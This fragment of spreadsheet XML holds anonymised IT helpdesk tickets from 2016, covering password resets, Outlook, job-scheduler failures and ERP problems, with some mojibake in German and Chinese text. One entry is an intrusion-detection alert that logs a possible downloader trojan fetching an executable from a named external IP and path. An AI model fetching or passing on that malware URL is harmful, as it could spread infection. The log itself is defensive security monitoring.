    <s v="HostName_66 : volume: f:\ label:dat1-HostName_66 9a625d75 is over  85% space consumed. space available: 1.27 m"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="security incidents - ( #in33987594) : 29866 vid22518 bare http get executable from ip address (possible downloader)"/>
    <s v="source ip :_x000d__x000a_system name :_x000d__x000a_user  name:_x000d__x000a_location :_x000d__x000a_sep , sms status :_x000d__x000a_field sales user ( yes / no) :  _x000d__x000a_dsw event log:_x000d__x000a_-------------------------------------------------------------------------------------------------------------------_x000d__x000a_event detail(s):_x000d__x000a__x000d__x000a_event_id 417013204:_x000d__x000a_[**] [1:21130977:10] 29866 vid22518 bare http get executable from ip address (possible downloader trojan) [**]_x000d__x000a_[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000d__x000a_[sensor id: 602982][event id: 281895][time: 2585087487.272206]_x000d__x000a_[xref =&gt; vid, 22518]_x000d__x000a_[src ip: 10.1.43.79][dst ip: 94.102.53.238][sport/itype: 61007][dport/icode: 80][proto: 6]_x000d__x000a_09/27/2016-11:39:36.272206 10.1.43.79:61007 -&gt; 94.102.53.238:80_x000d__x000a_tcp ttl:127 tos:0x0 id:16297 iplen:20 dgmlen:119 df_x000d__x000a_***ap*** seq: 0xfbc9dc8c ack: 0xe57c9433 win: 0x102 tcplen: 20_x000d__x000a_==pcap s==_x000d__x000a_=0c=00=00=00xz=eawn'=04=00w=00=00=00w=00=00=00e=00=00w?=a9@=00=7f=06=f23=0a=01+o^f5=ee=eeo=00p=fb=c9=dc=8c=e5|=943p=18=01=02=d4=3d=00=00get /~yahoo/csrsv.exe http/1.1=0d=0ahost: 94.102.53.238=0d=0aconnection: keep-alive=0d=0a=0d=0a_x000d__x000a_==pcap e==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /~yahoo/csrsv.exe]_x000d__x000a__x000d__x000a_[ex http_hostname 10: 94.102.53.238]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_[correlation_data]_x000d__x000a_sep 27 06:01:47 71.80.15.0714 dhcpd[12774]: dhcpack on 10.1.43.79 to c4:8e:8f:f6:4a:e5 (lhql8516405) via eth1 relay 10.1.40.8 lease-duration 14400 (renew)_x000d__x000a__x000d__x000a_lowercaseurlcorrelation : /~yahoo/csrsv.exe_x000d__x000a_srcip : 10.1.43.79_x000d__x000a_urlcorrelation : /~yahoo/csrsv.exe_x000d__x000a_vendorreference : vid, 22518_x000d__x000a_foreseeconndirection : outgoing_x000d__x000a_refererproxycorrelationurl : null_x000d__x000a_foreseeexternalip : 94.102.53.238_x000d__x000a_eventtypeid : 200020003203113798_x000d__x000a_unique_event_hash : 946134710_x000d__x000a_ontologyid : 200020003203728796_x000d__x000a_foreseeinternalip : 10.1.43.79_x000d__x000a_urlpath : /~yahoo/csrsv.exe_x000d__x000a_srchostname : lhql8516405_x000d__x000a_inspectorruleid : 277082_x000d__x000a_inspectoreventid : 077564517_x000d__x000a_httpmethod : get_x000d__x000a_netacuity_destination_organization : ecatel ltd_x000d__x000a_vendoreventid : 281895_x000d__x000a_device_id : 2550522_x000d__x000a_foreseemaliciousprobability : 0.0846984_x000d__x000a_event_summary : 29866 vid22518 bare http get executable from ip address (possible downloader trojan)_x000d__x000a_tcpflags : ***ap***_x000d__x000a_agentid : 102805_x000d__x000a_srchostname : lhql8516405_x000d__x000a_cvss : -1_x000d__x000a_foreseedstipgeo : den dolder,nld_x000d__x000a_devip : 10.32.100.17_x000d__x000a_inlineaction : 2_x000d__x000a_proto : tcp_x000d__x000a_dstport : 80_x000d__x000a_vendorpriority : 2_x000d__x000a_ileatdatacenter : true_x000d__x000a_vendorsigid : 29866_x000d__x000a_srcport : 61007_x000d__x000a_globalproxycorrelationurl : csrsv7_x000d__x000a_host : 94.102.53.238_x000d__x000a_dstip : 94.102.53.238_x000d__x000a_source_network_type : internal_x000d__x000a_url : 94.102.53.238/~yahoo/csrsv.exe_x000d__x000a_urlfullpath : /~yahoo/csrsv.exe_x000d__x000a_urlhost : 94.102.53.238_x000d__x000a_irreceivedtime : 1474976715927_x000d__x000a_action : not blocked_x000d__x000a_ctainstanceid : 0_x000d__x000a_vendorversion : 7_x000d__x000a_httpversion : http/1.1_x000d__x000a_logtimestamp : 2585087487_x000d__x000a_foreseemaliciouscomment : negativeevaluationthreshold:0.0181;positiveevaluationthreshold:1;modelversion:854922;classifiertype:naivebayes;annotatorlist:action-not blocked-&gt;0.7719~0.8136|eventtypeid-200020003203113798-&gt;0.0005~0.0001|ontologyid-200020003203728796-&gt;0.0005~0.0001;evaluationmodels-&gt;nb-global-model:0.9736:0.0181;_x000d__x000a_netacuity_destination_isp : ecatel ltd_x000d__x000a_device_network_type : internal_x000d__x000a_srcmacaddress : c4:8e:8f:f6:4a:e5_x000d__x000a_sherlockruleid : 690393_x000d__x000a_eventtypepriority : 3"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="2"/>
  </r>
  <r>
    <s v="HostName_1379 : volume: c:\ label:sys-HostName_1379 28385a7b is over  85% space consumed. space available: 3.7 g"/>
    <s v="HostName_1379 : volume: c:\ label:sys-HostName_1379 28385a7b is over _x000d__x000a_85% space consumed. space available: 3.7 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="hp2çƒ­åŽ‹ç‚‰æ•°æ®ä¼ è¾“å¡ï¼Œæ•°æ®æ›´æ–°ä¸å‡ºæ¥ï¼Œè¯·å¸®æˆ‘è½¬ç»™å°è´º"/>
    <s v="hp2çƒ­åŽ‹ç‚‰æ•°æ®ä¼ è¾“å¡ï¼Œæ•°æ®æ›´æ–°ä¸å‡ºæ¥ï¼Œè¯·å¸®æˆ‘è½¬ç»™å°è´º"/>
    <s v="basqoyjx frvwhbse"/>
    <x v="30"/>
  </r>
  <r>
    <s v="zpononpo mp's data is incorrect."/>
    <s v="zpononpo mp's data is incorrect."/>
    <s v="nrugzxkl lohqkvry"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_2645 failed in job_scheduler at: 09/28/2016 03:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2645 failed in job_scheduler at: 09/28/2016 03:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="question  -  who is taking care on report zzsdspc7?"/>
    <s v="i've realised that 1,131 not needed customer stock buckets are not needed._x000d__x000a_the customer order are already completed but the stock is reserved for these orders._x000d__x000a_therefore stock will sit there for ever._x000d__x000a__x000d__x000a_would you please address to the people responsible._x000d__x000a_that would allow us to reduce stock level._x000d__x000a_"/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="53"/>
  </r>
  <r>
    <s v="user creation and deletion on droracle , HostName_1317 and HostName_1316"/>
    <s v="create users : 1. unix team  2. user with sudo privileges for trayton and neal._x000d__x000a_server : droracle _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_delete users : 1. markhty snyder 2. gptmrqzu muiqteyf 3. pollaurid griener _x000d__x000a_server : HostName_1317 , HostName_1316 , droracle _x000d__x000a_"/>
    <s v="klopfgxd odxgmqhy"/>
    <x v="46"/>
  </r>
  <r>
    <s v="not able to upload the engineering_tool with any or the vpn or vpn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nmqgrkex.ldeizfrm@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35982.4b39fca0]_x000d__x000a__x000d__x000a_"/>
    <s v="nmqgrkex ldeizfrm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="passwort frau koburvmc jwzlebap #51117"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mobaidfx.gviwlsrm@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_frau rieÃŸ wird ab dienstag, 4. oktober wieder ihre arbeit beginnen._x000d__x000a__x000d__x000a_bitte passwort neu vergeben._x000d__x000a__x000d__x000a_frau rieÃŸ wird voraussichtlich von 8.00 bis 10.00 uhr im bÃ¼ro erreichbar sein._x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="mobaidfx gviwlsrm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bridgex from lacw8515941 - monitoring_tool robot transaction down"/>
    <s v="bridgex from lacw8515941 - monitoring_tool robot transaction down_x000d__x000a__x000d__x000a_&quot;copy of netperfmon event log : transaction 'bridgex from lacw8515941' is down. reason: step 'uploading excel file step 2' failed: element 'file upload field' was not found&quot; action was executed successfully _x000d__x000a__x000d__x000a__x000d__x000a_hi team,_x000d__x000a__x000d__x000a_we got the above alert in monitoring_tool, checked with basis team and there is no issues from their side._x000d__x000a__x000d__x000a_"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="59"/>
  </r>
  <r>
    <s v="both the numbers for gso are not working."/>
    <s v="both the numbers for gso are not working._x000d__x000a_germany : (49) 6003-827-7333_x000d__x000a_usa : (1) 724-539-5226 or 800-848-1135 _x000d__x000a__x000d__x000a_calls are landing on the phones but caller can not hear anything._x000d__x000a_communication is one way. (agent can hear but not caller)"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="6"/>
  </r>
  <r>
    <s v="network outage : kingston pa site is down since 2:10 am et on 09/28."/>
    <s v="what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________2:10 am et on 09/28.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_noi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printer prtsg004"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bcxpeuko.utorqehx@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a_please help me to confirm printer prtsg004 as we are not able to configure from our side._x000d__x000a__x000d__x000a_"/>
    <s v="bcxpeuko utorqehx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue p 11, passwort zurÃ¼ck setzen"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): p 11_x000d__x000a__x000d__x000a_enter user id of user having the issue: reisenkostenabrechnung nicht mÃ¶glich, da zu viele falsche anmeldungen, bitte passwort zurÃ¼ck setzen. danke _x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with:_x000d__x000a__x000d__x000a_describe the issue:_x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="ukqoiswv unjarfoq"/>
    <x v="19"/>
  </r>
  <r>
    <s v="reactivate ruenzm - it is our ceo (usa - deloro group) - it is urgent"/>
    <s v="reactivate ruenzm - it is our ceo (usa - deloro group) - it is urgent"/>
    <s v="pwotudlf wpjlxfke"/>
    <x v="19"/>
  </r>
  <r>
    <s v="outlook - indizierung"/>
    <s v="ich kann seit ca. 1 woche meine suche im outlook nicht verwenden, da der hinweis &quot;ihre elemente werden zurzeit von outlook indiziert&quot; erscheint._x000d__x000a_habe auch meinen pc, mit geÃ¶ffnetem outlook, Ã¼bers wochenende laufen lassen, doch bisher immer das gleiche._x000d__x000a_aktuell mÃ¼ssen noch 10.809 elemente indiziert werden._x000d__x000a_gestern waren es ca. 2.500 elemente._x000d__x000a_ich habe somit massive probleme, da ich mails von vor einem jahr bis jetzt mit der suchfunkton nicht finden kann."/>
    <s v="qjsydrfo oeicyswt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock erp account (user id: murakt)"/>
    <s v="please unlock my erp account (user id: murakt)"/>
    <s v="knpodsal pzdkcimf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3186 failed in job_scheduler at: 09/28/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3186 failed in job_scheduler at: 09/28/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="login blocked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ublisodp.qydfvpgw@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_i am not able to login to business_client due to wrong password._x000d__x000a_pl unblock and let me know the existing password to reset the same with new password._x000d__x000a__x000d__x000a_"/>
    <s v="ublisodp qydfvpgw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="out look is not opening"/>
    <s v="out look is not opening , showing error message couldn't able to access mail"/>
    <s v="kzybxher prjaswhe"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to login to ess protel "/>
    <s v="unable to login to ess portal "/>
    <s v="svmkobqj sgqtdubv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to windows "/>
    <s v="unable to login to windows "/>
    <s v="zgmdster bdvcealj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for knemilvx dvqtziya using password_management_tool password reset."/>
    <s v="the"/>
    <s v="jtwykasf elkhcjqn"/>
    <x v="16"/>
  </r>
  <r>
    <s v="atp for mm 4870517 issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qgrbdnoc.dgupnhxv@gmail.com_x000d__x000a__x000d__x000a_hello,sirs_x000d__x000a__x000d__x000a_we had a schedule agreement 4111336752 about mm 4870517*720pcs which request delivery time is in 10/11, and the stocks can meet our agreement, but in 9/23, there is 35050345 4870517*4280pcs created in plant_283, and then it took our all current plant_283 stock, and only confirmed us 700pcs as below which cannot meet the customer's demand , so we want to check what is the current rule about the confirm date, why the stock meet the back order not the previous order?_x000d__x000a_[cid:image001.png@01SID_35977.b52c2ee0]_x000d__x000a_"/>
    <s v="qgrbdnoc dgupnhxv"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job bkwin_HostName_768_inc failed in job_scheduler at: 09/27/2016 22:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_768_inc failed in job_scheduler at: 09/27/2016 22:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job SID_56filesys failed in job_scheduler at: 09/27/2016 22:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_56filesys failed in job_scheduler at: 09/27/2016 22:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ba02 printer still keep printing some error task_please help"/>
    <s v="we've faced the problem ie.  the printer ba02 do keep printing the job which is wrongly assigned by some user (vvkujup).  we turned off the printer and lan by yesterday evening , and turn-on printer and plug lan this morning, however the printer do still printing such jobs.  as checked with local printer team, he suggested to change ip address at ba02 as attached .  please help us stop such error printing and advise back to us aerp., "/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="4"/>
  </r>
  <r>
    <s v="erp-mae windows ad account is locked."/>
    <s v="erp-mae ad account is locked and hana production jobs are failing. unlock immediately and share the root-cause._x000d__x000a_please assign to safrgyynjit or team and reach them immediately on call."/>
    <s v="petgvwch zevpkogu"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ask zwip report"/>
    <s v="when i sae the zwip report. the sales order35049170 / 060 is not shown customer and sales order as well_x000d__x000a_please, check the reason and let me know how to show above information in zwip._x000d__x000a_ - plant : plant_68_x000d__x000a_ - prodcution order : 226043035 "/>
    <s v="zcqnuawo zxdtskpw"/>
    <x v="44"/>
  </r>
  <r>
    <s v="win8.1 ç³»ç»Ÿæç¤ºæ›´æ–°åŽï¼Œæ‰€æœ‰åº”ç”¨è½¯ä»¶éƒ½ä¸èƒ½æ‰“å¼€ã€‚"/>
    <s v="win8.1 ç³»ç»Ÿæç¤ºæ›´æ–°åŽï¼Œæ‰€æœ‰åº”ç”¨è½¯ä»¶éƒ½ä¸èƒ½æ‰“å¼€ã€‚"/>
    <s v="bxtdalsj rnkvcshb"/>
    <x v="31"/>
  </r>
  <r>
    <s v="job Job_3186 failed in job_scheduler at: 09/27/2016 20:49:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3186 failed in job_scheduler at: 09/27/2016 20:49:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="metal cutting technology p/l (company zqt 2005137185"/>
    <s v="hi team,_x000d__x000a__x000d__x000a_i have created the attached quote, however, it is not up showing correctly (see attached). can you please fix this as soon as possible? "/>
    <s v="uisewznr ewtmkphs"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ç”¨å‹-åº“å­˜å¸å’ŒçŽ°å­˜é‡ä¸ç¬¦"/>
    <s v="ç”¨å‹-åº“å­˜å¸å’ŒçŽ°å­˜é‡ä¸ç¬¦ï¼Œäº§å“ç¼–ç ï¼š112001960200ï¼Œåº“å­˜å°è´¦15kgï¼ŒçŽ°å­˜é‡75kg"/>
    <s v="qypsxviu xagqtblv"/>
    <x v="47"/>
  </r>
  <r>
    <s v="job Job_3186 failed in job_scheduler at: 09/27/2016 20:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3186 failed in job_scheduler at: 09/27/2016 20:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="download issue"/>
    <s v="_x000a__x000a_received from: uezonywf.rldbvipu@gmail.com_x000a__x000a_i am trying to download the software to do tooling reports on my company dell 2 in 1 and i keep getting error messages. i assume someone will have to take remote access of my computer to see what is going on._x000a__x000a_tommyth duyhurmont_x000a_channel partner sales engineer_x000a_company inc._x000a_uezonywf.rldbvipu@gmail.com&lt;mailto:uezonywf.rldbvipu@gmail.com&gt;_x000a_www.company.com&lt;_x000a__x000a__x000a_www.company.com/engineering_tool/en/home.html_x000a__x000a_[_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="uezonywf rldbvipu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="i have another shipment that will not process"/>
    <s v="commodity details error the same as inc1552879 _x000d__x000a_dn 9169306896_x000d__x000a_sto 5019278106_x000d__x000a_this consignment is urgent so can it be resolved quickly please?"/>
    <s v="lzspyjki smdbqnef"/>
    <x v="17"/>
  </r>
  <r>
    <s v="cannot connect"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vjuxfokc.cwhxnoug@gmail.com_x000d__x000a__x000d__x000a_for some reason i cannot connect to the vpn?_x000d__x000a_i have tried my usual username and password but it is not working?_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image005.jpg@01SID_3595f.59714a30]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vjuxfokc cwhxnoug"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1142 failed in job_scheduler at: 09/27/2016 18:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1142 failed in job_scheduler at: 09/27/2016 18:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="user getting prompt to upgrade java."/>
    <s v="user getting prompt to upgrade java._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-advised the user to complete the installation._x000d__x000a_-issue resolved."/>
    <s v="mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp business workplace inbox is not working"/>
    <s v="erp inbox for smitrtgcj1 is not working.  i have created a background report to run and deliver to my erp inbox but it is not delivering.  _x000a_i have also tried to create a mail thru the erp inbox and send to myself and i get the error erp user &lt;christgry smhdyhti&gt; does not exist even though i show up in the soplant_49 transaction."/>
    <s v="pdokqgrn bqkpaxcm"/>
    <x v="10"/>
  </r>
  <r>
    <s v="custom quote.  at saving receive error message of &quot;enter rate/usd rate type m for 9/27 in the system settings"/>
    <s v="name:lagqcompanyo xqtldrcs_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:lagqcompanyo.xqtldrcs@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:custom quote.  at saving receive error message of &quot;enter rate/usd rate type m for 9/27 in the system settings_x000a_=====see attachment ===================="/>
    <s v="lagqkmto xqtldrcs"/>
    <x v="12"/>
  </r>
  <r>
    <s v="business_client issue"/>
    <s v="1.) briefly describe what you were trying to do and the issue you have encountered._x000d__x000a_i am trying to access material drawings but am getting an error message when i log in (see attached)_x000d__x000a_2.) please include a screenshot of any error messages"/>
    <s v="xzvqgodj arqcuvim"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1129conf_s failed in job_scheduler at: 09/27/2016 16:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1129conf_s failed in job_scheduler at: 09/27/2016 16:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="can you reset my password for SID_37"/>
    <s v="name:fybwjzhx ojgrpafb_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:fybwjzhx.ojgrpafb@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:can you reset my password for SID_37"/>
    <s v="fybwjzhx ojgrpafb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for fueiklyv jargqpkm on erp / production / bw"/>
    <s v="please reset my password"/>
    <s v="fueiklyv jargqpkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i installed the analysis for microsoft excel in erp business intelligence and i am getting an error message"/>
    <s v="i am able to open the analysis for microsoft excel but when i click on log in to erp business objects i get an error message that says &quot;the launcher is exited with error, see log file for more details.  the analysis add-in is not registered correctly.&quot;  when i click on logfile folder, i get a dialog box that ways &quot;windows can't open this file: file: launcher_log_8056.glf&quot; and asked me to find the programdnty to open the file."/>
    <s v="fueiklyv jargqpkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="channel management claim issue "/>
    <s v="claim 845354 is approved but is not showing up in settlement list.  can not get credit to generate.  _x000a__x000a_also can not reject in order to create a new claim.   i created a new claim to replace but have concerns with proceeding to process if i cant  reject the first - _x000a__x000a_please advise, as we owe the customer their credit.   new claim 845691"/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="14"/>
  </r>
  <r>
    <s v="job Job_1146a failed in job_scheduler at: 09/27/2016 16:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1146a failed in job_scheduler at: 09/27/2016 16:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="dvncgqek skvcrebq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm addin boxes dont stay checked"/>
    <s v="gso please reach out to lryturhy to correct his addin issue. after rechecking his crm addin boxes and closing outlook, they become unchecked again and the addin portion of the ribbon dierppears."/>
    <s v="crjhotyk pxslorbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="expense report blocked"/>
    <s v="expense report blocked"/>
    <s v="cqlehowf aosqelnr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="working on the fax lines in usa to see if we can do them without having to order any parts"/>
    <s v="working on the fax lines in usa to see if we can do them without having to order any parts"/>
    <s v="makiosjc kxapdhnm"/>
    <x v="6"/>
  </r>
  <r>
    <s v="outlook not working, was ok this morning, but will not let me back in now"/>
    <s v="outlook down_x000a_wlhxrogv yawtxuod "/>
    <s v="wlhxrogv yawtxuod"/>
    <x v="0"/>
  </r>
  <r>
    <s v="working on getting his new laptop ready for him"/>
    <s v="working on getting his new laptop ready for him"/>
    <s v="zjihgovn cqxahony"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to load outlook"/>
    <s v="unable to load outlook"/>
    <s v="tkflbvim smwqzfgc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business objects analysis errors"/>
    <s v="i recently changed my work computer from an 8gb &quot;business&quot; model to a 16gb &quot;engineering&quot; model. i frequently use business objects analysis for excel. when opening files that i have saved that use data connections, i am running into an error that prompts me to try and &quot;migrate&quot; the connection from odbc to http. see attached error. because i am not familiar with this, i cannot refresh data on old workbooks. can someone assist? "/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login issue"/>
    <s v="login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad unlocked the account._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="nmpworvu upgtrvnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3194 failed in job_scheduler at: 09/27/2016 14:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3194 failed in job_scheduler at: 09/27/2016 14:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="(srvlavpwdrprd01.company.company.com) is not responding, this is our calibration system, need up aerp"/>
    <s v="(srvlavpwdrprd01.company.company.com) is not responding, this is our calibration system, need up aerp"/>
    <s v="vushymxe ifrbzdtl"/>
    <x v="60"/>
  </r>
  <r>
    <s v="netweaver access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: oqvwgnkc.gkjylpzx@gmail.com_x000d__x000a__x000d__x000a_hello.   can someone help me with netweaver access?_x000d__x000a__x000d__x000a_"/>
    <s v="oqvwgnkc gkjylpzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for fueiklyv jargqpkm on erp / production / erp"/>
    <s v="i tried using my windows login password but it is not working."/>
    <s v="fueiklyv jargqpkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype certificate error "/>
    <s v="skype certificate error"/>
    <s v="rstjupxe yjlgsiah"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dealer open orders are appearing in vkm4 "/>
    <s v="hi,_x000a__x000a_please raise it ticket. all dealer open orders are appearing in vkm4 â€“ credit check even though the credit utilization is within the limits. this started after changing the credit terms as z060 to all open orders._x000a__x000a__x000a_gajthyana hegdergyt_x000a_manager- finance_x000a_miecoszw.mhvbnodw@gmail.com _x000a_for technical assistance:  / in.techsupport@company.com _x000a_ _x000a__x000a_"/>
    <s v="miecoszw mhvbnodw"/>
    <x v="9"/>
  </r>
  <r>
    <s v="client 0819 company, inc / rejected edi inwarehouse_tool # 0006475468"/>
    <s v="from: nihtykki mcgyuouald  _x000a_sent: tuesday, september 27, 2016 8:50 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: amar fw: client 0819 company, inc / rejected edi inwarehouse_tool # 1117586579_x000a__x000a_hello,_x000a__x000a_please check into the below edi file to see why it was rejected from our system.  they have provided the technical support below._x000a__x000a_"/>
    <s v="iqcylpok ascpqvni"/>
    <x v="61"/>
  </r>
  <r>
    <s v="pr - workflow"/>
    <s v="from: grhryueg dewicrth _x000a_sent: tuesday, september 27, 2016 7:37 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: amar fw: pr - workflow_x000a__x000a_hello it help,_x000a__x000a_can you help â€“ please see the image in the email below â€“ there is a workflow that i need to process but it will not give me an approve or reject option and will not pull up the details in the portal._x000a__x000a_i am also accessing it from outside of company as i am traveling for work._x000a__x000a_"/>
    <s v="kehtxprg uekapfzt"/>
    <x v="29"/>
  </r>
  <r>
    <s v="new laptop setup"/>
    <s v="help to create and configure the user login profile and  outlook."/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ticket update on inplant_864352"/>
    <s v="ticket update on inplant_864352"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to view data in distributor_tool account"/>
    <s v="unable to view data in distributor_tool account"/>
    <s v="csotmdiw yfeqcbti"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dock station- telephony_software ip phone"/>
    <s v="request for install the dock station and ip phone for the telephony_software application"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="18"/>
  </r>
  <r>
    <s v="the termination action for johhdyanna kadyuiluza has completed."/>
    <s v="hello , _x000a__x000a_a termination for johhdyanna kadyuiluza, 2111165258, effective 09.09.2016 has been approved. _x000a_"/>
    <s v="mobaidfx gviwlsrm"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_1129conf_s failed in job_scheduler at: 09/27/2016 12:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1129conf_s failed in job_scheduler at: 09/27/2016 12:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="vpn connectivity is too slow"/>
    <s v="vpn connectivity is too slow"/>
    <s v="pbfscenq qvaylkne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn disconnecting"/>
    <s v="vpn disconnecting"/>
    <s v="hjxtczwo wdrxmtqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp-mae id seems to be locked in hana SID_60"/>
    <s v="erp-mae id seems to be locked in hana SID_60_x000a__x000a_request for unlock."/>
    <s v="petgvwch zevpkogu"/>
    <x v="52"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="mvaxhzks kyzvflth"/>
    <x v="2"/>
  </r>
  <r>
    <s v="printer not printing"/>
    <s v="name:xernsfqa uzvsnlbd_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xernsfqa.uzvsnlbd@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am receiving error messages when trying to update my printer drivers. i'm unable to print to the printers i need to utilize, dg16 and dg10."/>
    <s v="xernsfqa uzvsnlbd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my outlook will not work on my computer. this was since my password change. it works on my phone but not my laptop."/>
